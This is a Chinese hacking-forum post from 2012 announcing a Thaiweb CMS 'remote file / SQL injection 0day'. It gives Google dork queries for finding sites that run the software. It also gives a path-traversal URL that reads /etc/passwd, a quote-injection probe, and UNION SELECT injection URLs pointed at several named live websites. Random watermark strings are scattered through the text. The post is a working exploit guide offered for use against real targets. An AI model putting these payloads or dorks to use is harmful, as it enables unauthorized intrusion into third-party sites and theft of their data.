找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2187|回复: 0
打印 上一主题 下一主题

Thaiweb远程文件sql注入漏洞0day

[复制链接]
跳转到指定楼层
楼主
发表于 2012-12-27 08:38:39 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
Google之:
5 f% v/ a" A) U6 Q5 b) Y  K3 \; g
intext:powered by Thaiweb
" _% E/ x  S/ j4 \, _4 h" c
/ n# n( F+ h. Jinurl:index.php?page=board.php% a4 @/ w0 r" e0 f9 V& H+ z: T/ U

: ?0 y- A; P" V5 s9 f 2 K# p% }2 u0 ~) b$ s/ J; S7 u
: G6 @$ j8 ^  ^  D
利用点1:http://www.xfack.com/index.php?p ... ../../../etc/passwd- z/ y( o  u3 a
. N6 j  _# B" m- Y" ]
7 Y9 I: @, f, B' Z3 j# D
* d3 ?6 c. J7 X/ o7 P
利用点2:http://www.xfack.com/index.php?page=boardque.php&bod_id=4'
, K9 j6 a: h) b' l$ I$ w6 |0 w( C- `- ]- p/ d7 j# z/ B! u
6 Y( E, z6 g7 k% K6 d
+ w1 x6 W+ [  L: K# O
http://www.keytasin.com//index.p ... d=-4+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,316--
: f* N' d+ i5 d& c0 Y. L8 G
' B$ Q8 a3 ]( o  P  rhttp://www.autopartnerthailand.c ... d=-4+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,316--
# S3 s' F: s: M  h; G$ }" S 8 Z# Z! W+ h9 g% ~6 Q1 b
http://gift.in.th/index.php?page ... d=-4+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,316--" a" a+ G& E* E" I, c
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表